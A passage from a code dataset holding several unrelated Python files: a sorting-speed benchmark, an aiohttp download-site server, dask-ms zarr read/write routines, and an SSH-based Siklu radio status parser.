out","sub_path":"atmPy/data_archives/arm/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":7531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"347690638","text":"# Wren Group\n\nimport time \nimport random\nimport copy\n\n# Below are the two sorting methods we used, Insertion and Selection sort.\n\ndef insertion_sort(arr):\n for k in range(1, len(arr)):\n cur = arr[k]\n j = k\n while j>0 and arr[j-1]>cur:\n arr[j]=arr[j-1]\n j = j-1\n arr[j] = cur\n\ndef selection_sort(arr):\n for i in range(len(arr)):\n max = i\n count = i+1\n \n while (count < len(arr)):\n if arr[count] < arr[i]:\n max = count\n temp = arr[max]\n arr[max] = arr[i]\n arr[i] = temp\n count += 1\n\n#______________________________________________________________________________________\n\nif __name__ == '__main__':\n\n#Below are the 30 individual trials. They are grouped by 1000, 2500, 5000, 7500, 10000.\n#The arrays are numbered 1-30 and are grouped two more times -- Once by either Increasing,\n#Decreasing, or Random, and then again by Insertion or Selection sort. We imported and\n#used Copy to remember the first array listed in the group so when we moved on to\n#Selection sort, it did not pull from the already sorted Insertion sort. This also keeps\n#the data consistent when comparing the two sort methods since the unsorted arrays are =. \n\n array_1 = []\n \n for i in range(0,999):\n array_1.append(i)\n array_2 = copy.copy(array_1)\n \nstart = time.clock()\ninsertion_sort(array_1)\nend = time.clock()\n\nprint('1000 Increasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_2)\nend = time.clock()\n\nprint('1000 Increasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_3 = []\n\nfor i in range(999,0,-1):\n array_3.append(i)\narray_4 = copy.copy(array_3)\n\nstart = time.clock()\ninsertion_sort(array_3)\nend = time.clock()\n\nprint('1000 Decreasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_4)\nend = time.clock()\n\nprint('1000 Decreasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_5 = []\ni = 0\nwhile(i<=1000):\n d = random.randint(1,99)\n array_5.append(d)\n i+=1\n \narray_6 = copy.copy(array_5)\n\nstart = time.clock()\ninsertion_sort(array_5)\nend = time.clock()\n\nprint('1000 Random Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_6)\nend = time.clock()\n\nprint('1000 Random Selection: ' + '{:.20f}'.format(end-start))\n\n#______________________________________________________________________________________\n\narray_7 = []\n \nfor i in range(0,2500):\n array_7.append(i)\narray_8 = copy.copy(array_7)\n \nstart = time.clock()\ninsertion_sort(array_7)\nend = time.clock()\n\nprint('2500 Increasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_8)\nend = time.clock()\n\nprint('2500 Increasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_9 = []\n\nfor i in range(2500,0,-1):\n array_9.append(i)\narray_10 = copy.copy(array_9)\n\nstart = time.clock()\ninsertion_sort(array_9)\nend = time.clock()\n\nprint('2500 Decreasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_10)\nend = time.clock()\n\nprint('2500 Decreasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_11 = []\ni = 0\nwhile(i<=2500):\n d = random.randint(1,99)\n array_11.append(d)\n i+=1\n \narray_12 = copy.copy(array_11)\n\nstart = time.clock()\ninsertion_sort(array_11)\nend = time.clock()\n\nprint('2500 Random Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_12)\nend = time.clock()\n\nprint('2500 Random Selection: ' + '{:.20f}'.format(end-start))\n\n#______________________________________________________________________________________\n\narray_13 = []\n \nfor i in range(0,5000):\n array_13.append(i)\narray_14 = copy.copy(array_13)\n \nstart = time.clock()\ninsertion_sort(array_13)\nend = time.clock()\n\nprint('5000 Increasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_14)\nend = time.clock()\n\nprint('5000 Increasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_15 = []\n\nfor i in range(5000,0,-1):\n array_15.append(i)\narray_16 = copy.copy(array_15)\n\nstart = time.clock()\ninsertion_sort(array_15)\nend = time.clock()\n\nprint('5000 Decreasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_16)\nend = time.clock()\n\nprint('5000 Decreasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_17 = []\ni = 0\nwhile(i<=5000):\n d = random.randint(1,99)\n array_17.append(d)\n i+=1\n \narray_18 = copy.copy(array_17)\n\nstart = time.clock()\ninsertion_sort(array_17)\nend = time.clock()\n\nprint('5000 Random Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_18)\nend = time.clock()\n\nprint('5000 Random Selection: ' + '{:.20f}'.format(end-start))\n\n#______________________________________________________________________________________\n\narray_19 = []\n \nfor i in range(0,7500):\n array_19.append(i)\narray_20 = copy.copy(array_19)\n \nstart = time.clock()\ninsertion_sort(array_19)\nend = time.clock()\n\nprint('7500 Increasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_20)\nend = time.clock()\n\nprint('7500 Increasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_21 = []\n\nfor i in range(7500,0,-1):\n array_21.append(i)\narray_22 = copy.copy(array_21)\n\nstart = time.clock()\ninsertion_sort(array_21)\nend = time.clock()\n\nprint('7500 Decreasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_22)\nend = time.clock()\n\nprint('7500 Decreasing Selection: ' + '{:.20f}'.format(end-start))\n\n#___________________________________\n\narray_23 = []\ni = 0\nwhile(i<=7500):\n d = random.randint(1,99)\n array_23.append(d)\n i+=1\n \narray_24 = copy.copy(array_23)\n\nstart = time.clock()\ninsertion_sort(array_23)\nend = time.clock()\n\nprint('7500 Random Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_24)\nend = time.clock()\n\nprint('7500 Random Selection: ' + '{:.20f}'.format(end-start))\n\n#______________________________________________________________________________________\n\narray_25 = []\n \nfor i in range(0,10000):\n array_25.append(i)\narray_26 = copy.copy(array_25)\n \nstart = time.clock()\ninsertion_sort(array_25)\nend = time.clock()\n\nprint('10,000 Increasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_26)\nend = time.clock()\n\nprint('10,000 Increasing Selection: ' + '{:.20f}'.format(end-start))\n\n#_____________________________________\n\narray_27 = []\n\nfor i in range(10000,0,-1):\n array_27.append(i)\narray_28 = copy.copy(array_27)\n\nstart = time.clock()\ninsertion_sort(array_27)\nend = time.clock()\n\nprint('10,000 Decreasing Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_28)\nend = time.clock()\n\nprint('10,000 Decreasing Selection: ' + '{:.20f}'.format(end-start))\n\n#_____________________________________\n\narray_29 = []\ni = 0\nwhile(i<=10000):\n d = random.randint(1,99)\n array_29.append(d)\n i+=1\n \narray_30 = copy.copy(array_29)\n\nstart = time.clock()\ninsertion_sort(array_29)\nend = time.clock()\n\nprint('10,000 Random Insertion: ' + '{:.20f}'.format(end-start))\n\nstart = time.clock()\nselection_sort(array_30)\nend = time.clock()\n\nprint('10,000 Random Selection: ' + '{:.20f}'.format(end-start))\n\n#______________________________________________________________________________________","sub_path":"Sort.py","file_name":"Sort.py","file_ext":"py","file_size_in_byte":7588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"360301874","text":"from aiohttp import web\nimport aiohttp_jinja2\nimport jinja2\nimport asyncio\nimport posixpath\nimport ssl\nfrom os.path import isfile\n\nfrom data.products import products, product_by_name\nfrom data.other import intro, technical, address, more, epc\nimport data.download as download_data\nfrom data.walker.walk import FileInfo, walk\nfrom translator.translator import translator, all_languages\n\nfrom typing import Dict, List, Optional\n\nfiles: Dict[str, Dict[str, List[FileInfo]]] = {} # Download page files, must be initialized\n\n\nroutes = web.RouteTableDef()\n\n\ndef translatable_template(func):\n async def handler(request):\n language = request.match_info.get(\"language\", \"ru\")\n tr = translator(language)\n\n result = await func(request)\n\n # Link to current page without /ru or /en prefix\n current_link_nolang = posixpath.join(*request.path.split(\"/\")[2:])\n\n # Links to ru, en, ... etc versions of current page\n languages_links = {f\"{lang}_link\": posixpath.join(\"/\"+lang, current_link_nolang) for lang in all_languages}\n return {\"tr\": tr,\n \"lang\": language,\n **languages_links,\n **result}\n return handler\n\n\ndef base_template(func):\n async def handler(request):\n result = await func(request)\n return {\"address\": address,\n \"epc\": epc,\n **result}\n return translatable_template(handler)\n\n\n@routes.get(\"/\")\nasync def index(request):\n raise web.HTTPFound(location=\"/ru/\") # redirect to default language\n\n\n@routes.get(\"/{language}/\")\n@aiohttp_jinja2.template(\"index.html\")\n@base_template\nasync def index(request):\n return {\"intro\": intro,\n \"products\": products,\n \"technical\": technical,\n \"more\": more\n }\n\n\n@routes.get(\"/{language}/product/{product}/\")\n@aiohttp_jinja2.template(\"download.html\")\n@base_template\nasync def download(request):\n product = product_by_name(request.match_info[\"product\"])\n\n return {\"product\": product,\n \"all_software\": files[product.name],\n \"version\": download_data.version,\n \"release_date\": download_data.release_date,\n \"size\": download_data.size,\n \"link\": download_data.link,\n \"download\": download_data.download,\n \"software_type\": download_data.software_category_by_name\n }\n\n\n# TODO: use nginx\nroutes.static('/static', \"view/static\")\n\n\nasync def walk_periodic(path: str, url_prefix: str):\n global files\n while True:\n files = walk(path, url_prefix)\n await asyncio.sleep(300) # Update every 5 minutes\n\n\ndef _app_factory() -> web.Application:\n app = web.Application()\n aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader('view/templates'))\n\n app.router.add_routes(routes)\n\n return app\n\n\nasync def _server_factory(keyfile: Optional[str] = None, certfile: Optional[str] = None) -> web.TCPSite:\n app = _app_factory()\n runner = web.AppRunner(app)\n await runner.setup()\n\n ssl_ctx = None\n if keyfile or certfile:\n ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n ssl_ctx.load_cert_chain(certfile=certfile, keyfile=keyfile)\n\n site = web.TCPSite(runner, ssl_context=ssl_ctx)\n return site\n\n\nasync def main():\n walker_coro = walk_periodic(\"view/static/download\", \"/static/download\") # periodic run\n asyncio.create_task(walker_coro)\n\n http_server_coro = (await _server_factory()).start()\n asyncio.create_task(http_server_coro)\n\n cert, key = \"fullchain.pem\", \"privkey.pem\"\n if isfile(cert) and isfile(key):\n https_server_coro = (await _server_factory(keyfile=key, certfile=cert)).start()\n asyncio.create_task(https_server_coro)\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n loop.run_forever()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"172277734","text":"from pathlib import Path\n\nimport dask\nimport dask.array as da\nfrom dask.array.core import normalize_chunks\nfrom dask.base import tokenize\nimport numcodecs\nimport numpy as np\n\nfrom daskms.constants import DASKMS_PARTITION_KEY\nfrom daskms.dataset import Dataset, Variable\nfrom daskms.dataset_schema import (\n DatasetSchema,\n encode_type,\n decode_type,\n decode_attr)\nfrom daskms.experimental.utils import (\n extent_args,\n select_vars_and_coords,\n column_iterator,\n promote_columns)\nfrom daskms.optimisation import inlined_array\nfrom daskms.utils import requires\nfrom daskms.fsspec_store import DaskMSStore\n\ntry:\n import zarr\nexcept ImportError as e:\n zarr_import_error = e\nelse:\n zarr_import_error = None\n\n\nDASKMS_ATTR_KEY = \"__daskms_zarr_attr__\"\n\n\ndef zarr_chunks(column, dims, chunks):\n if chunks is None:\n return None\n\n zchunks = []\n\n for dim, dim_chunks in zip(dims, chunks):\n if any(np.isnan(dc) for dc in dim_chunks):\n raise NotImplementedError(\n f\"Column {column} has nan chunks \"\n f\"{dim_chunks} in dimension {dim} \"\n f\"This is not currently supported\")\n\n unique_chunks = set(dim_chunks[:-1])\n\n if len(unique_chunks) == 0:\n zchunks.append(dim_chunks[-1])\n elif len(unique_chunks) == 1:\n zchunks.append(dim_chunks[0])\n else:\n raise NotImplementedError(\n f\"Column {column} has heterogenous chunks \"\n f\"{dim_chunks} in dimension {dim} \"\n f\"zarr does not currently support this\")\n\n return tuple(zchunks)\n\n\ndef create_array(ds_group, column, column_schema,\n schema_chunks, coordinate=False):\n\n codec = numcodecs.Pickle() if column_schema.dtype == object else None\n\n if column_schema.chunks is None:\n try:\n # No column chunking found, probably an ndarray,\n # derive column chunking from chunks on dataset\n chunks = tuple(schema_chunks[d] for d in column_schema.dims)\n except KeyError:\n # Nope, just set chunks equal to dimension size\n chunks = tuple((s,) for s in column_schema.shape)\n else:\n chunks = column_schema.chunks\n\n zchunks = zarr_chunks(column, column_schema.dims, chunks)\n\n array = ds_group.require_dataset(column, column_schema.shape,\n chunks=zchunks,\n dtype=column_schema.dtype,\n object_codec=codec,\n exact=True)\n\n if zchunks is not None:\n # Expand zarr chunks to full dask resolution\n # For comparison purposes\n zchunks = normalize_chunks(array.chunks, column_schema.shape)\n\n if zchunks != chunks:\n raise ValueError(\n f\"zarr chunks {zchunks} \"\n f\"don't match dask chunks {column_schema.chunks}. \"\n f\"This can cause data corruption as described in \"\n f\"https://zarr.readthedocs.io/en/stable/tutorial.html\"\n f\"#parallel-computing-and-synchronization\")\n\n array.attrs[DASKMS_ATTR_KEY] = {\n \"dims\": column_schema.dims,\n \"coordinate\": coordinate,\n \"array_type\": encode_type(column_schema.type),\n }\n\n\ndef prepare_zarr_group(dataset_id, dataset, store):\n try:\n # Open in read/write, must exist\n group = zarr.open_group(store=store.map, mode=\"r+\")\n except zarr.errors.GroupNotFoundError:\n # Create, must not exist\n group = zarr.open_group(store=store.map, mode=\"w-\")\n\n group_name = f\"{store.table}_{dataset_id}\"\n ds_group = group.require_group(store.table).require_group(group_name)\n\n schema = DatasetSchema.from_dataset(dataset)\n schema_chunks = schema.chunks\n\n for column, column_schema in schema.data_vars.items():\n create_array(ds_group, column, column_schema, schema_chunks, False)\n\n for column, column_schema in schema.coords.items():\n create_array(ds_group, column, column_schema, schema_chunks, True)\n\n ds_group.attrs.update({\n **schema.attrs,\n DASKMS_ATTR_KEY: {\"chunks\": dict(dataset.chunks)}\n })\n\n return ds_group\n\n\ndef zarr_setter(data, name, group, *extents):\n try:\n zarray = getattr(group, name)\n except AttributeError:\n raise ValueError(f\"{name} is not a variable of {group}\")\n\n selection = tuple(slice(start, end) for start, end in extents)\n zarray[selection] = data\n return np.full((1,)*len(extents), True)\n\n\ndef _gen_writes(variables, chunks, factory, indirect_dims=False):\n for name, var in variables.items():\n if isinstance(var.data, da.Array):\n ext_args = extent_args(var.dims, var.chunks)\n var_data = var.data\n elif isinstance(var.data, np.ndarray):\n try:\n var_chunks = tuple(chunks[d] for d in var.dims)\n except KeyError:\n var_chunks = tuple((s,) for s in var.shape)\n ext_args = extent_args(var.dims, var_chunks)\n var_data = da.from_array(var.data, chunks=var_chunks,\n inline_array=True, name=False)\n else:\n raise NotImplementedError(f\"Writing {type(var.data)} \"\n f\"unsupported\")\n\n if var_data.nbytes == 0:\n continue\n\n token_name = (f\"write~{name}-\"\n f\"{tokenize(var_data, name, factory, *ext_args)}\")\n\n write = da.blockwise(zarr_setter, var.dims,\n var_data, var.dims,\n name, None,\n factory, None,\n *ext_args,\n adjust_chunks={d: 1 for d in var.dims},\n concatenate=False,\n name=token_name,\n meta=np.empty((1,)*len(var.dims), bool))\n write = inlined_array(write, ext_args[::2])\n\n # Alter the dimension names to preserve laziness on coordinates.\n dims = [f\"_{d}_\" for d in var.dims] if indirect_dims else var.dims\n\n yield name, (dims, write, var.attrs)\n\n\n@requires(\"pip install dask-ms[zarr] for zarr support\",\n zarr_import_error)\ndef xds_to_zarr(xds, store, columns=None):\n \"\"\"\n Stores a dataset of list of datasets defined by `xds` in\n file location `store`.\n\n Parameters\n ----------\n xds : Dataset or list of Datasets\n Data\n store : str or Path\n Path to store the data\n columns : list of str or str or None\n Columns to store. `None` or `\"ALL\"` stores all columns on each dataset.\n Otherwise, a list of columns should be supplied.\n\n Returns\n -------\n writes : Dataset\n A Dataset representing the write operations\n \"\"\"\n if isinstance(store, DaskMSStore):\n pass\n elif isinstance(store, Path):\n store = DaskMSStore(f\"file://{store}\")\n elif isinstance(store, str):\n store = DaskMSStore(f\"file://{store}\")\n else:\n raise TypeError(f\"store '{store}' must be \"\n f\"Path, str or DaskMSStore\")\n\n columns = promote_columns(columns)\n\n if isinstance(xds, Dataset):\n xds = [xds]\n elif isinstance(xds, (tuple, list)):\n if not all(isinstance(ds, Dataset) for ds in xds):\n raise TypeError(\"xds must be a Dataset or list of Datasets\")\n else:\n raise TypeError(\"xds must be a Dataset or list of Datasets\")\n\n write_datasets = []\n\n for di, ds in enumerate(xds):\n group = prepare_zarr_group(di, ds, store)\n\n data_vars, coords = select_vars_and_coords(ds, columns)\n data_vars = dict(_gen_writes(data_vars, ds.chunks, group))\n # Include coords in the write dataset so they're reified\n data_vars.update(dict(_gen_writes(coords, ds.chunks, group,\n indirect_dims=True)))\n\n # Transfer any partition information over to the write dataset\n partition = ds.attrs.get(DASKMS_PARTITION_KEY, False)\n\n if not partition:\n attrs = None\n else:\n attrs = {DASKMS_PARTITION_KEY: partition,\n **{k: getattr(ds, k) for k, _ in partition}}\n\n write_datasets.append(Dataset(data_vars, attrs=attrs))\n\n return write_datasets\n\n\ndef zarr_getter(zarray, *extents):\n return zarray[tuple(slice(start, end) for start, end in extents)]\n\n\ndef group_sortkey(element):\n return int(element[0].split('_')[-1])\n\n\n@requires(\"pip install dask-ms[zarr] for zarr support\",\n zarr_import_error)\ndef xds_from_zarr(store, columns=None, chunks=None):\n \"\"\"\n Reads the zarr data store in `store` and returns list of\n Dataset's containing the data.\n\n Parameters\n ----------\n store : str or Path\n Path containing the data\n columns : list of str or str or None\n Columns to read. `None` or `\"ALL\"` stores all columns on each dataset.\n Otherwise, a list of columns should be supplied.\n chunks: dict or list of dicts\n chunking schema for each dataset\n\n Returns\n -------\n writes : Dataset or list of Datasets\n Dataset(s) representing write operations\n \"\"\"\n if isinstance(store, DaskMSStore):\n pass\n elif isinstance(store, Path):\n store = DaskMSStore(f\"file://{store}\")\n elif isinstance(store, str):\n store = DaskMSStore(f\"file://{store}\")\n else:\n raise TypeError(f\"store '{store}' must be \"\n f\"Path, str or DaskMSStore\")\n\n columns = promote_columns(columns)\n\n if chunks is None:\n pass\n elif isinstance(chunks, (tuple, list)):\n if not all(isinstance(v, dict) for v in chunks):\n raise TypeError(\"chunks must be None, a dict or a list of dicts\")\n elif isinstance(chunks, dict):\n chunks = [chunks]\n else:\n raise TypeError(\"chunks must be None, a dict or a list of dicts\")\n\n datasets = []\n numpy_vars = []\n\n table_group = zarr.open(store.map)[store.table]\n\n for g, (group_name, group) in enumerate(sorted(table_group.groups(),\n key=group_sortkey)):\n group_attrs = decode_attr(dict(group.attrs))\n dask_ms_attrs = group_attrs.pop(DASKMS_ATTR_KEY)\n natural_chunks = dask_ms_attrs[\"chunks\"]\n group_chunks = {d: tuple(dc) for d, dc in natural_chunks.items()}\n\n if chunks:\n # Defer to user-supplied chunking strategy\n try:\n group_chunks.update(chunks[g])\n except IndexError:\n group_chunks.update(chunks[-1]) # Reuse last chunking.\n pass\n\n data_vars = {}\n coords = {}\n\n for name, zarray in column_iterator(group, columns):\n attrs = decode_attr(dict(zarray.attrs[DASKMS_ATTR_KEY]))\n dims = attrs[\"dims\"]\n coordinate = attrs.get(\"coordinate\", False)\n array_chunks = tuple(group_chunks.get(d, s) for d, s\n in zip(dims, zarray.shape))\n\n array_chunks = da.core.normalize_chunks(array_chunks, zarray.shape)\n ext_args = extent_args(dims, array_chunks)\n token_name = f\"read~{name}-{tokenize(zarray, *ext_args)}\"\n\n read = da.blockwise(zarr_getter, dims,\n zarray, None,\n *ext_args,\n concatenate=False,\n name=token_name,\n meta=np.empty((0,)*zarray.ndim, zarray.dtype))\n\n read = inlined_array(read, ext_args[::2])\n var = Variable(dims, read, attrs)\n (coords if coordinate else data_vars)[name] = var\n\n # Save numpy arrays for reification\n typ = decode_type(attrs[\"array_type\"])\n\n if typ is np.ndarray:\n numpy_vars.append(var)\n elif typ is da.Array:\n pass\n else:\n raise TypeError(f\"Unknown array_type '{attrs['array_type']}'\")\n\n datasets.append(Dataset(data_vars, coords=coords, attrs=group_attrs))\n\n # Reify any numpy arrays directly into their variables\n for v, a in zip(numpy_vars, dask.compute(v.data for v in numpy_vars)[0]):\n v.data = a\n\n return datasets\n","sub_path":"daskms/experimental/zarr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"312034376","text":"from __future__ import print_function\n\nimport collections\nimport os\nimport pandas as pd\nimport platform\nimport re\nimport sys\nimport sys\nimport time\nfrom multiprocessing import Pool\nfrom subprocess import call\n\ntry:\n from configparser import ConfigParser\nexcept ImportError:\n from ConfigParser import ConfigParser # ver. < 3.0\n\ntry:\n import wexpect\n\n TIMEOUT = wexpect.TIMEOUT\n EOF = wexpect.EOF\nexcept:\n import pexpect\n\n TIMEOUT = pexpect.TIMEOUT\n EOF = pexpect.EOF\n\nfrom datetime import datetime, timedelta\n\n\n############################################################################\n\nclass SikluUnit:\n def __init__(self, host, username, password, port='22', connection_timeout=12, debug=True):\n self.host = host\n self.user = username\n self.passwd = password\n self.port = port\n self.connection_timeout = connection_timeout\n self.debug = debug\n self.prompt = '~ #'\n self.prompt2 = \">$\"\n\n self.connected = False\n self.connection = None\n\n # if platform.system() == 'Windows':\n # self.sshask_newkey = 'Store key in cache?'\n # self.sshask_newkey_answer = 'y'\n # else:\n self.sshask_newkey = 'Are you sure you want to continue connecting'\n self.sshask_newkey_answer = 'yes'\n\n self.sshask_passwd = self.user + \"@\" + self.host + \"'s password: \"\n self.noroutehost = 'No route to host'\n self.exit = 'exit'\n\n def disconnect(self):\n if self.connected:\n self.connection.sendline(self.exit)\n self.connection.expect(EOF)\n self.connected = False\n self.connection = None\n\n def __del__(self):\n self.disconnect()\n\n def connect(self):\n # renew SSH key\n # ssh - keygen - f \"/root/.ssh/known_hosts\" - R 172.20.4.6\n if self.connected:\n self.disconnect()\n\n kiss = True\n\n try:\n if platform.system() == 'Windows':\n foo = wexpect.spawn(r'ssh %s@%s' % (self.user, self.host))\n else: # assume linux\n foo = pexpect.spawn('ssh %s@%s' % (self.user, self.host))\n\n i = foo.expect([TIMEOUT, self.sshask_newkey, self.sshask_passwd, self.noroutehost], timeout=self.connection_timeout)\n\n if i == 0: ## Timeout\n if debug:\n print(\"[%s] Connection timeout\" % self.host)\n kiss = False\n if i == 1: ## lors de la premiere connexion\n foo.sendline(self.sshask_newkey_answer)\n j = foo.expect([TIMEOUT, self.sshask_passwd])\n if j == 0:\n if debug:\n print(\"[%s] Password incorrect\" % self.host)\n kiss = False\n if i == 3:\n if self.debug:\n print(\"[%s] No route to host\" % self.host)\n kiss = False\n if kiss:\n foo.sendline(self.passwd)\n foo.expect(self.prompt2)\n self.connection = foo\n self.connected = True\n if self.debug:\n print(\"[%s] Connected successfully\" % self.host)\n except Exception as e:\n if self.debug:\n print(e)\n print(\"[%s] Unexpected error: %s\" % (self.host, foo.before))\n\n def send_command(self, command, no_wait=False):\n if self.debug:\n print('[%s] %s' % (self.host, command))\n self.connection.sendline(command)\n if no_wait:\n return\n\n self.connection.expect(self.prompt2)\n try:\n return self.connection.before.decode('utf-8')\n except:\n return self.connection.before\n\n\n#######################################################################################\nclass SikluCommandParam:\n def __init__(self, name='', value='', regex=r'', format_func=None):\n self.name = name\n self.value = value\n self.regex = regex\n self.format_func = format_func\n\n\nclass SikluCommandParserBase:\n cmd = ''\n cmd_params = [SikluCommandParam()]\n reverse_reply = False\n multiline = False\n\n def __init__(self, connection=None):\n self.connection = connection\n\n def parse(self):\n if self.connection:\n self.reply = self.connection.send_command(self.cmd)\n if self.reverse_reply:\n lines = self.reply.split(\"\\r\\n\")\n lines.reverse()\n self.reply = r\"\\r\\n\".join(lines)\n else:\n self.reply = ''\n return self.parse_reply()\n\n def parse_reply(self):\n for param in self.cmd_params:\n if param.regex:\n if param.format_func:\n param.value = param.format_func(self, self.find_value(param.regex, self.reply))\n else:\n param.value = self.find_value(param.regex, self.reply)\n\n return [param.value for param in self.cmd_params]\n\n def find_value(self, regex, text):\n if self.multiline:\n r = re.search(regex, text, re.MULTILINE)\n else:\n r = re.search(regex, text)\n if r:\n s = r.groups()[0].strip().replace(',', '')\n return s\n else:\n return []\n\n def __str__(self):\n return ','.join(param.name for param in self.cmd_params)\n\n def set_connection(self, connection):\n self.connection = connection\n\n\n#######################################################################################\nclass ShowSystem(SikluCommandParserBase):\n cmd = 'show system'\n\n def format_days_up_time(self, time_str):\n return int(time_str.split(':')[0])\n\n cmd_params = [SikluCommandParam('system_description', '', r\"system description\\s+: (.+)\\n\"),\n SikluCommandParam('system_name', '', r\"system name\\s+: (.+)\\n\"),\n SikluCommandParam('system_location', '', r\"system location\\s+: (.+)\\n\"),\n SikluCommandParam('system_up_days', '', r\"system uptime\\s+: (.+)\\n\", format_days_up_time),\n SikluCommandParam('system_time', '', r\"system time\\s+: (.+)\\n\"),\n SikluCommandParam('system_date', '', r\"system date\\s+: (.+)\\n\"),\n SikluCommandParam('system_temp', '', r\"system temperature\\s+: (.+)\\n\"),\n SikluCommandParam('queue_early_discard', '', r\"system queue-early-discard\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowInventory(SikluCommandParserBase):\n cmd = 'show inventory 1 serial'\n cmd_params = [SikluCommandParam('system_sn', '', r\"inventory 1 serial\\s+: (.+)\\n\"), ]\n\n\nclass ShowNTP(SikluCommandParserBase):\n cmd = 'show ntp'\n cmd_params = [\n SikluCommandParam('ntp_1_server', '', r\"ntp 1 server\\s+: (.+)\\n\"),\n SikluCommandParam('ntp_1_tmz', '', r\"ntp 1 tmz\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowSNMPManager(SikluCommandParserBase):\n cmd = 'show snmp-mng'\n cmd_params = [\n SikluCommandParam('snmp_mng_1_ip_addr', '', r\"snmp-mng 1 ip-addr\\s+: (.+)\\n\"),\n SikluCommandParam('snmp_mng_1_sec_name', '', r\"snmp-mng 1 security-name\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowSNMPAgent(SikluCommandParserBase):\n cmd = 'show snmp-agent'\n cmd_params = [\n SikluCommandParam('snmp_agent_read_com', '', r\"snmp-agent read-com\\s+: (.+)\\n\"),\n SikluCommandParam('snmp_agent_write_com', '', r\"snmp-agent write-com\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowSyslog(SikluCommandParserBase):\n cmd = 'show syslog'\n cmd_params = [\n SikluCommandParam('syslog_1_server', '', r\"syslog 1 server\\s+: (.+)\\n\"),\n ]\n\n\nclass LastLogEvents(SikluCommandParserBase):\n cmd = 'show log'\n reverse_reply = True\n multiline = True\n cmd_params = [SikluCommandParam('last rf reset', '', r\"([A-Z]{1}[a-z]{2}[0-9:\\s]+) sw cad: link down eth eth0\"),\n SikluCommandParam('last system reset', '', r\"([A-Z]{1}[a-z]{2}[0-9:\\s]+) sw bspd: \\*\\*\\* Reset\"),\n ]\n # def parse_reply(self):\n # pass\n\n\nclass ShowSW(SikluCommandParserBase):\n cmd = 'show sw'\n cmd_params = [SikluCommandParam('bank', '1', ''),\n SikluCommandParam('b1_ver', '', r\"1\\s+[MH-]*?([\\.0123456789]+)\\s+\"),\n # SikluCommandParam('b1_date', '', r\"1\\s+[MH-]*?[\\.0123456789]+\\s+([\\-0123456789]+)\\s+\"),\n # SikluCommandParam('b1_time', '', r\"1\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+([\\:0123456789]+)\\s+\"),\n SikluCommandParam('b1_running', '',\n r\"1\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+([\\w-]+)\\s+\"),\n SikluCommandParam('b1_scheduled_to_run', '',\n r\"1\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+[\\w-]+\\s+([\\w]+)\\s+\"),\n SikluCommandParam('b1_startup', '',\n r\"1\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+[\\w-]+\\s+[\\w]+\\s+([\\w]+)\"),\n SikluCommandParam('bank', '2', ''),\n SikluCommandParam('b2_ver', '', r\"2\\s+[MH-]*?([\\.0123456789]+)\\s+\"),\n # SikluCommandParam('b2_date', '', r\"2\\s+[MH-]*?[\\.0123456789]+\\s+([\\-0123456789]+)\\s+\"),\n # SikluCommandParam('b2_time', '', r\"2\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+([\\:0123456789]+)\\s+\"),\n SikluCommandParam('b2_running', '',\n r\"2\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+([\\w-]+)\\s+\"),\n SikluCommandParam('b2_scheduled_to_run', '',\n r\"2\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+[\\w-]+\\s+([\\w]+)\\s+\"),\n SikluCommandParam('b2_startup', '',\n 